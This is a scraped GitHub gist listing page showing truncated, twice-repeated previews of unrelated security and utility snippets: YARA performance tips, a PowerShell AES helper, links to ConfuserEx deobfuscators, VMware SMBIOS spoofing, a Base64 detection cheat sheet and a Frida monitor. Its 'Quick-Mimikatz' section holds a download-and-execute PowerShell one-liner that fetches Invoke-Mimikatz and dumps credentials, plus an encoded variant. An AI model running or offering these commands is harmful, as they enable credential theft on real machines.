Ilia Dafchev idafchev

## yara_performance_guidelines.md

      
              1 file
            
          
              26 forks
            
          
              1 comment
            
          
              118 stars
            
          
                Neo23x0
                / yara_performance_guidelines.md
            
            
              Last active
              April 30, 2024 10:39
            
              
                YARA Performance Guidelines
              
          
    This Gist has been transfered into a Github Repo.
You'll find the most recent version here.
YARA Performance Guidelines

When creating your rules for YARA keep in mind the following guidelines in order to get the best performance from them.
This guide is based on ideas and recommendations by Victor M. Alvarez and WXS.

Revision 1.4, October 2020, applies to all YARA versions higher than 3.7


## PowershellAes.ps1
function Create-AesManagedObject($key, $IV) {
    $aesManaged = New-Object "System.Security.Cryptography.AesManaged"
    $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
    $aesManaged.BlockSize = 128
    $aesManaged.KeySize = 256
    if ($IV) {
        if ($IV.getType().Name -eq "String") {
            $aesManaged.IV = [System.Convert]::FromBase64String($IV)
        }

## gist:44fe4461a4552acf303a
UnConfuserEx https://mega.nz/#!U1hxwQKb!7WFBSjrZgg8ieFp15K0RJW8rWuyMHZTO9bpCekhBQfY
ConfuserExDupPopPatcher https://mega.nz/#!IkhHzZDS!vPYABdYJtuDIGJBHdKzwIqLajxugJaNlENWr5CWjNlo
ConfuserExStringDecryptor https://mega.nz/#!plhxRJyY!Vq9eRS-gixC__q75860gDD8Tcm_ncOfCCCP_HQKguUM
ConfuserExCallFixer https://mega.nz/#!0gZFlbwC!KFka_Kxe-GuU-d8COni91xmGPbiRnbX6lBLYAomn7No

I'm not responsible for what you do with these -- they may very well be backdoored

## Quick-Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*

#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;

#encoded-mimikatz [local]
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBl

## vmware.txt
#https://www.google.com/search?q=smbios.reflecthost&oq=smbios.r&aqs=chrome.0.0j69i57j0l4.2850j0j7&sourceid=chrome&ie=UTF-8 | smbios.reflecthost - Google Search
#http://www.bitcon.be/how-to-install-an-hp-branded-windows-os-as-a-virtual-server/ | How to install an HP branded Windows OS as a virtual server | BITCON - IT consultants
#https://communities.vmware.com/thread/162241?tstart=0 | This system is not supported platform |VMware Communities
#https://superuser.com/questions/199906/how-to-edit-bios-information-for-a-virtual-machine-in-vmware | How to edit BIOS information for a virtual machine in VMWare? - Super User
#http://www.insanelymac.com/forum/topic/292170-how-to-spoof-real-mac-in-vmware/ | How to spoof real Mac in VMware - Multi-booting and Virtualisation - InsanelyMac Forum

Method 1: edit VMX file for the specific VM
#add this line
SMBIOS.reflectHost = TRUE

## SpecialFolderLocations.md

      
              1 file
            
          
              5 forks
            
          
              0 comments
            
          
              28 stars
            
          
                DamianSuess
                / SpecialFolderLocations.md
            
            
              Last active
              May 6, 2024 07:53
            
              
                C# Environment.SpecialFolder
              
          
    More info can be found at, https://docs.microsoft.com/en-us/dotnet/api/system.environment.specialfolder?view=netframework-4.7.2
Code example

// C:\ProgramData\
var path1 = System.Environment.GetFolderPath(System.Environment.SpecialFolder.CommonApplicationData);

// C:\Users\USERNAME\AppData\Roaming
var path2 = System.Environment.GetFolderPath(System.Environment.SpecialFolder.ApplicationData);

  
## gz_extract.py
import os, gzip, shutil

dir_name = 'x'

def gz_extract(directory):
    extension = ".gz"
    os.chdir(directory)
    for item in os.listdir(directory): # loop through items in dir
      if item.endswith(extension): # check for ".gz" extension
          gz_name = os.path.abspath(item) # get full path of files

## Base64_CheatSheet.md

      
              1 file
            
          
              43 forks
            
          
              6 comments
            
          
              263 stars
            
          
                Neo23x0
                / Base64_CheatSheet.md
            
            
              Last active
              March 10, 2024 09:15
            
              
                Learning Aid - Top Base64 Encodings Table
              
          
    Base64 Patterns - Learning Aid


Base64 Code
Mnemonic Aid
Decoded*
Description


JAB
🗣 Jabber
$.
Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env:


TVq
📺 Television
MZ
MZ header


SUVY
🚙 SUV
IEX
PowerShell Invoke Expression


SQBFAF
🐣 Squab favorite
I.E.
PowerShell Invoke Expression (UTF-16)


SQBuAH
🐣 Squab uahhh
I.n.
PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz


PAA
💪 "Pah!"
&lt;.
Often used by Emotet (UTF-16)


## NtMonitor.py
import frida
import sys

def on_message(message, data):
    if message['type'] == 'send':
        print(message['payload'])
    elif message['type'] == 'error':
        print(message['stack'])
    else:
     print(message)

## [1] Description
// The ObRegisterCallbacks routine registers a list of callback routines for thread, process, and desktop handle operations.
// This function is a most public method used by anti cheat / anti virus software.

// Offical document:
// https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-obregistercallbacks

// Function syntax:
// NTSTATUS ObRegisterCallbacks(
//  POB_CALLBACK_REGISTRATION CallbackRegistration,
//  PVOID                     *RegistrationHandle
	function Create-AesManagedObject($key, $IV) {
	$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
	$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
	$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
	$aesManaged.BlockSize = 128
	$aesManaged.KeySize = 256
	if ($IV) {
	if ($IV.getType().Name -eq "String") {
	$aesManaged.IV = [System.Convert]::FromBase64String($IV)
	}
	UnConfuserEx https://mega.nz/#!U1hxwQKb!7WFBSjrZgg8ieFp15K0RJW8rWuyMHZTO9bpCekhBQfY
	ConfuserExDupPopPatcher https://mega.nz/#!IkhHzZDS!vPYABdYJtuDIGJBHdKzwIqLajxugJaNlENWr5CWjNlo
	ConfuserExStringDecryptor https://mega.nz/#!plhxRJyY!Vq9eRS-gixC__q75860gDD8Tcm_ncOfCCCP_HQKguUM
	ConfuserExCallFixer https://mega.nz/#!0gZFlbwC!KFka_Kxe-GuU-d8COni91xmGPbiRnbX6lBLYAomn7No

	I'm not responsible for what you do with these -- they may very well be backdoored
	NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!

	#mimikatz [local]
	IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;

	#encoded-mimikatz [local]
	powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBl
	#https://www.google.com/search?q=smbios.reflecthost&oq=smbios.r&aqs=chrome.0.0j69i57j0l4.2850j0j7&sourceid=chrome&ie=UTF-8 \| smbios.reflecthost - Google Search
	#http://www.bitcon.be/how-to-install-an-hp-branded-windows-os-as-a-virtual-server/ \| How to install an HP branded Windows OS as a virtual server \| BITCON - IT consultants
	#https://communities.vmware.com/thread/162241?tstart=0 \| This system is not supported platform \|VMware Communities
	#https://superuser.com/questions/199906/how-to-edit-bios-information-for-a-virtual-machine-in-vmware \| How to edit BIOS information for a virtual machine in VMWare? - Super User
	#http://www.insanelymac.com/forum/topic/292170-how-to-spoof-real-mac-in-vmware/ \| How to spoof real Mac in VMware - Multi-booting and Virtualisation - InsanelyMac Forum

	Method 1: edit VMX file for the specific VM
	#add this line
	SMBIOS.reflectHost = TRUE
	import os, gzip, shutil

	dir_name = 'x'

	def gz_extract(directory):
	extension = ".gz"
	os.chdir(directory)
	for item in os.listdir(directory): # loop through items in dir
	if item.endswith(extension): # check for ".gz" extension
	gz_name = os.path.abspath(item) # get full path of files
Base64 Code	Mnemonic Aid	Decoded*	Description
`JAB`	🗣 Jabber	`$.`	Variable declaration (UTF-16), e.g. `JABlAG4AdgA` for `$env:`
`TVq`	📺 Television	`MZ`	MZ header
`SUVY`	🚙 SUV	`IEX`	PowerShell Invoke Expression
`SQBFAF`	🐣 Squab favorite	`I.E.`	PowerShell Invoke Expression (UTF-16)
`SQBuAH`	🐣 Squab uahhh	`I.n.`	PowerShell Invoke string (UTF-16) e.g. `Invoke-Mimikatz`
`PAA`	💪 "Pah!"	`<.`	Often used by Emotet (UTF-16)
	import frida
	import sys

	def on_message(message, data):
	if message['type'] == 'send':
	print(message['payload'])
	elif message['type'] == 'error':
	print(message['stack'])
	else:
	print(message)
	// The ObRegisterCallbacks routine registers a list of callback routines for thread, process, and desktop handle operations.
	// This function is a most public method used by anti cheat / anti virus software.

	// Offical document:
	// https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-obregistercallbacks

	// Function syntax:
	// NTSTATUS ObRegisterCallbacks(
	// POB_CALLBACK_REGISTRATION CallbackRegistration,
	// PVOID *RegistrationHandle